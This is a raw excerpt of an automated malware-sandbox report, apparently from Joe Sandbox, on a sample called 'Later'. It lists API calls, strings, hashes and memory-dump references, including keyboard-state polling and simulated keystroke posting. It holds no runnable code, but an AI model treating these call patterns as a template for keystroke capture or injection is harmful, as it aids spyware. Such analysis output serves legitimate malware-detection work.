                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Window$ItemMoveRect$Invalidate
                                        • String ID:
                                        • API String ID: 3096461208-0
                                        • Opcode ID: bb5c17b7977113f57cb710e9ebd2016147115ce42fbffb1f096a9512dea7906c
                                        • Instruction ID: 5d23901899da5f2c51d6ba869fd0d4b1779e328a758ef749c14f27b60670dfce
                                        • Opcode Fuzzy Hash: bb5c17b7977113f57cb710e9ebd2016147115ce42fbffb1f096a9512dea7906c
                                        • Instruction Fuzzy Hash: 0A512F71B00605AFDB58CF69DD89BAEBBB6FF88310F248129F915D7290D770AE048B54
                                        APIs
                                          • Part of subcall function 00BF1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2412,?,00000000,?,?,?,?,00BF1AA7,00000000,?), ref: 00BF1F76
                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00BF24AF
                                        • KillTimer.USER32(?,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00BF254A
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00C2BF17
                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2BF48
                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2BF5F
                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00BF1AA7,00000000,?,?,00BF1EBE,?,?), ref: 00C2BF7B
                                        • DeleteObject.GDI32(00000000), ref: 00C2BF8D
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 641708696-0
                                        • Opcode ID: e20461cd321fa6f5ff49552bd87408f6e78d1596bc5b663be77e53b801fd63c8
                                        • Instruction ID: 939c11a410039abd5c2292e6562172d818ec11a5825552e1d6ae500f36e8b6c6
                                        • Opcode Fuzzy Hash: e20461cd321fa6f5ff49552bd87408f6e78d1596bc5b663be77e53b801fd63c8
                                        • Instruction Fuzzy Hash: A661DC31100629DFDB259F58DE88B3A77F1FF40316F208668E25257AA0C779AC98DF90
                                        APIs
                                          • Part of subcall function 00BF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00BF29BC
                                        • GetSysColor.USER32(0000000F), ref: 00BF25AF
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ColorLongWindow
                                        • String ID:
                                        • API String ID: 259745315-0
                                        • Opcode ID: 31003e04bd58f8845258e3fba3a4c987e1beae8d762f9beb9bd51e1db53df1c1
                                        • Instruction ID: 468028999ea0537ced831ccf7db9f8fc0fc4292755b801ff08c1d233bfd3741d
                                        • Opcode Fuzzy Hash: 31003e04bd58f8845258e3fba3a4c987e1beae8d762f9beb9bd51e1db53df1c1
                                        • Instruction Fuzzy Hash: 3241A431000114ABDB259F28DC88BBD3BA5EB16331F2542A5FE658B1E2D7308D45EB25
                                        APIs
                                          • Part of subcall function 00C10AB6: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00C02A3E,?,00008000), ref: 00C10AD2
                                          • Part of subcall function 00C101AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C02A58,?,00008000), ref: 00C101CF
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C02ADF
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00C02C2C
                                          • Part of subcall function 00C03EBE: _wcscpy.LIBCMT ref: 00C03EF6
                                          • Part of subcall function 00C1379F: _iswctype.LIBCMT ref: 00C137A7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                        • API String ID: 537147316-3738523708
                                        • Opcode ID: e76d85d7012a25b4bd935b6f11b87770ccc2b2235866e0e09d0e3c6495656b64
                                        • Instruction ID: ba6749a39c60d9d69a5980f2865fda8afc062f744745cc811a3e7e5bee4f7083
                                        • Opcode Fuzzy Hash: e76d85d7012a25b4bd935b6f11b87770ccc2b2235866e0e09d0e3c6495656b64
                                        • Instruction Fuzzy Hash: DA02A1705083419FD724EF24C881AAFBBE5FF99314F14492DF595932A2DB30DA4AEB42
                                        APIs
                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 014DC863
                                        • type_info::operator==.LIBVCRUNTIME ref: 014DC88A
                                        • ___TypeMatch.LIBVCRUNTIME ref: 014DC996
                                        • CatchIt.LIBVCRUNTIME ref: 014DC9EB
                                        • IsInExceptionSpec.LIBVCRUNTIME ref: 014DCA71
                                        • _UnwindNestedFrames.LIBCMT ref: 014DCAF8
                                        • CallUnexpected.LIBVCRUNTIME ref: 014DCB13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                        • String ID: csm$csm$csm
                                        • API String ID: 4234981820-393685449
                                        • Opcode ID: b751598fd2ccf66b43dcbe45a88420beef94455ac505829fb07c8620026e624a
                                        • Instruction ID: 12a41b6687bc7fdf971e7c1ba146f71b1372a9682b245bb633fa97fb52da71ad
                                        • Opcode Fuzzy Hash: b751598fd2ccf66b43dcbe45a88420beef94455ac505829fb07c8620026e624a
                                        • Instruction Fuzzy Hash: 6AC1497190020ADBCF15DFA9D8E0AAEBBB9BF14311F04425FE811AB362D731DA51CB91
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
                                        • String ID: false$true
                                        • API String ID: 2593140031-2658103896
                                        • Opcode ID: da76e192a1ffcb1f503569c8157922c2a35b3bc8b6888baf6f2776fb88160a49
                                        • Instruction ID: 02bcec8d40082cd32469ec5b5b3c6be4431a8559a74fb0ee3a4ad723a682d5f5
                                        • Opcode Fuzzy Hash: da76e192a1ffcb1f503569c8157922c2a35b3bc8b6888baf6f2776fb88160a49
                                        • Instruction Fuzzy Hash: 7C2141B6D00315AADF55EFA6D884A9F7FA8EF25B10F00841FB904AF261DB718544CBA1
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00C5039C
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00C5041D
                                        • GetKeyState.USER32(000000A0), ref: 00C50438
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00C50452
                                        • GetKeyState.USER32(000000A1), ref: 00C50467
                                        • GetAsyncKeyState.USER32(00000011), ref: 00C5047F
                                        • GetKeyState.USER32(00000011), ref: 00C50491
                                        • GetAsyncKeyState.USER32(00000012), ref: 00C504A9
                                        • GetKeyState.USER32(00000012), ref: 00C504BB
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00C504D3
                                        • GetKeyState.USER32(0000005B), ref: 00C504E5
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 718786e4722df8ae324a531620a16a01648f0f4424a1d6210ae2783e412bd771
                                        • Instruction ID: 6daa7da86d593f3fe56153dd11a34077c5f4da0141e072ebb8eb2fb9611fcc8b
                                        • Opcode Fuzzy Hash: 718786e4722df8ae324a531620a16a01648f0f4424a1d6210ae2783e412bd771
                                        • Instruction Fuzzy Hash: ED41F9385447C96AFF31866488043B5BFA06F11342F288059DED5D66C2EBA45BCCCBAE
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C0323
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C0345
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C0365
                                        • __Getcvt.LIBCPMT ref: 014C0422
                                        • __Getcvt.LIBCPMT ref: 014C046C
                                          • Part of subcall function 01402350: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01402376
                                          • Part of subcall function 01402350: std::_Lockit::~_Lockit.LIBCPMT ref: 0140240A
                                        • std::_Facet_Register.LIBCPMT ref: 014C053D
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C0555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$Lockit$Lockit::~_$GetcvtLockit::_$Facet_Locinfo::_Locinfo_dtorRegister
                                        • String ID: false$true
                                        • API String ID: 2460365190-2658103896
                                        • Opcode ID: 2faec3e7f454014935391bb3d8e2d1ca6b46bc2c81b545dd0bd52831fcf33f3a
                                        • Instruction ID: e2695777e5d48ca98219429573019c0078add871e3bbb6d118cf96de47e52f1f
                                        • Opcode Fuzzy Hash: 2faec3e7f454014935391bb3d8e2d1ca6b46bc2c81b545dd0bd52831fcf33f3a
                                        • Instruction Fuzzy Hash: 4C818EB5D00309DBDB21DF95C840BDEB7F4BF29710F14826EE805AB251EB75AA44CB91
                                        APIs
                                          • Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
                                          • Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC
                                        • CoInitialize.OLE32 ref: 00C688B5
                                        • CoUninitialize.OLE32 ref: 00C688C0
                                        • CoCreateInstance.OLE32(?,00000000,00000017,00C83BBC,?), ref: 00C68920
                                        • IIDFromString.OLE32(?,?), ref: 00C68993
                                        • #8.OLEAUT32(?), ref: 00C68A2D
                                        • #9.WSOCK32(?,?), ref: 00C68A8E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 1994486276-1287834457
                                        • Opcode ID: ab605df7596f2505c68e6c505294c37b71c26c527e35e345c4793dfc46708d9d
                                        • Instruction ID: bec87692f2dfd8e4623a18c4a0fe880968b622535225a511153b723fb74e7e0f
                                        • Opcode Fuzzy Hash: ab605df7596f2505c68e6c505294c37b71c26c527e35e345c4793dfc46708d9d
                                        • Instruction Fuzzy Hash: 6A61AF702083019FD720DF64C889B6EB7E4EF49714F104A59FA859B291CB70ED8CDB92
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 00BF260D
                                        • SetTextColor.GDI32(?,000000FF), ref: 00BF2617
                                        • SetBkMode.GDI32(?,00000001), ref: 00BF262C
                                        • GetStockObject.GDI32(00000005), ref: 00BF2634
                                        • GetClientRect.USER32(?), ref: 00C2C02C
                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00C2C043
                                        • GetWindowDC.USER32(?), ref: 00C2C04F
                                        • GetPixel.GDI32(00000000,?,?), ref: 00C2C05E
                                        • ReleaseDC.USER32(?,00000000), ref: 00C2C070
                                        • GetSysColor.USER32(00000005), ref: 00C2C08E
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                        • String ID:
                                        • API String ID: 3430376129-0
                                        • Opcode ID: b0e817ef3c542b06790ecba67cff9ab0b7167f8126167a04c21d2315e79ad2ab
                                        • Instruction ID: 532255062782e58c9935284dedfe21cc3742ac341c28ce97344162d79f2594fa
                                        • Opcode Fuzzy Hash: b0e817ef3c542b06790ecba67cff9ab0b7167f8126167a04c21d2315e79ad2ab
                                        • Instruction Fuzzy Hash: AC113732500205BFDBA15FA4EC49BED7BB1EF18331F204265FA25960E1CB310959EF19
                                        APIs
                                        • EnumChildWindows.USER32(?,00C4AF1D), ref: 00C4AE5B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: ChildEnumWindows
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 3555792229-1603158881
                                        • Opcode ID: 655f3ad4c013a05425e1747d78095a34c808519968338cb87554499e0a0baecc
                                        • Instruction ID: c606e3b4df5d190756a60fe1dd2da3944fd7abb574a882a2c86bdc8ff5d53b22
                                        • Opcode Fuzzy Hash: 655f3ad4c013a05425e1747d78095a34c808519968338cb87554499e0a0baecc
                                        • Instruction Fuzzy Hash: 0C91C870A40506ABDF08DF60C481BEEFB79FF45304F508119E86AA7191DF70AA99EBD1
                                        APIs
                                          • Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3
                                          • Part of subcall function 00BF2714: GetCursorPos.USER32(?), ref: 00BF2727
                                          • Part of subcall function 00BF2714: ScreenToClient.USER32(00CB67B0,?), ref: 00BF2744
                                          • Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2769
                                          • Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2777
                                        • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C7C417
                                        • ImageList_EndDrag.COMCTL32 ref: 00C7C41D
                                        • ReleaseCapture.USER32 ref: 00C7C423
                                        • SetWindowTextW.USER32(?,00000000), ref: 00C7C4CD
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C7C4E0
                                        • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C7C5C2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 1924731296-2107944366
                                        • Opcode ID: 659d67666fa12d8e7bbfff8409307c5fd5bb6a05da769f92f87c3a0b08bbde18
                                        • Instruction ID: d175300e9f4075a94cc3127f53d863d23f3fa1ac62a59e791235fa705147fc10
                                        • Opcode Fuzzy Hash: 659d67666fa12d8e7bbfff8409307c5fd5bb6a05da769f92f87c3a0b08bbde18
                                        • Instruction Fuzzy Hash: 76517971204205AFDB14EF20CC96BAE7BE1FB84310F10862DF959972E1CB71A959DB52
                                        APIs
                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,014FAC8F), ref: 014F9203
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DecodePointer
                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                        • API String ID: 3527080286-3064271455
                                        • Opcode ID: 4b588d65fcc7720937304a9ccc0c3334f43c99411af2ebd3ee76f90b10fd3e8f
                                        • Instruction ID: 5f5d8c6b7b37ca5b4946f5f9d04de87eeb9d283ae80250c005775a71544814b6
                                        • Opcode Fuzzy Hash: 4b588d65fcc7720937304a9ccc0c3334f43c99411af2ebd3ee76f90b10fd3e8f
                                        • Instruction Fuzzy Hash: DA519B7490420ECBDF159F9DD9482AE7FB4FB49308F06045BF690AB3A8CB318525CB01
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C78AEC
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: 7808eeea5cbd743d7742858a8c136051e0d9a9af3e1c2d10c0465f974c56f96a
                                        • Instruction ID: 2fcf32d0b0d7a3c358f87b250575471525eebae2e9025d0ea2bf1d0f2b547842
                                        • Opcode Fuzzy Hash: 7808eeea5cbd743d7742858a8c136051e0d9a9af3e1c2d10c0465f974c56f96a
                                        • Instruction Fuzzy Hash: 365193B0581208BFEF219B25CC8DB5D7BA4BB05360F208516F728D61E1CF71AA9C9B51
                                        APIs
                                          • Part of subcall function 00C4B310: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4B330
                                          • Part of subcall function 00C4B310: GetCurrentThreadId.KERNEL32 ref: 00C4B337
                                          • Part of subcall function 00C4B310: AttachThreadInput.USER32(00000000,?,00C4A01E,?,00000001), ref: 00C4B33E
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A029
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C4A046
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C4A049
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A052
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C4A070
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C4A073
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A07C
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C4A093
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C4A096
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: f7381f2f8e4898d644abfc3c6bde628c81b836b5c4fb898c6a901b8423e83555
                                        • Instruction ID: 8d9c552bc654a503b212c7f843e24367745a6735dc4bd3e5d0aad709474933b8
                                        • Opcode Fuzzy Hash: f7381f2f8e4898d644abfc3c6bde628c81b836b5c4fb898c6a901b8423e83555
                                        • Instruction Fuzzy Hash: 601104B1550618BEF6106F618C8DF6E3F2DEB4C761F200419F6446B0A0CAF26C509BA8
                                        APIs
                                          • Part of subcall function 014BC820: std::locale::_Init.LIBCPMT ref: 014BC916
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014BB212
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014BB221
                                        • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 014BB25B
                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014BB32E
                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014BB33D
                                        • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 014BB370
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ArraySafe$Bound$Element$Initstd::locale::_
                                        • String ID: Unknown data type
                                        • API String ID: 1810180989-732792229
                                        • Opcode ID: e40b85d7d1e40e987f63c96cb46d85aca67e4eedf20c75136b0307cc869640e6
                                        • Instruction ID: 50a7c3ee0c3415bc6c8fdc807622de4fb0ab087e7ad829c15bef76ed14a3b68f
                                        • Opcode Fuzzy Hash: e40b85d7d1e40e987f63c96cb46d85aca67e4eedf20c75136b0307cc869640e6
                                        • Instruction Fuzzy Hash: 6FA19170A0011A9FDB29DF68CC84BEEB7B5FF54300F1085AAD505A7664DB34AE84CFA1
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C5466F
                                        • LoadStringW.USER32(00000000), ref: 00C54676
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5468C
                                        • LoadStringW.USER32(00000000), ref: 00C54693
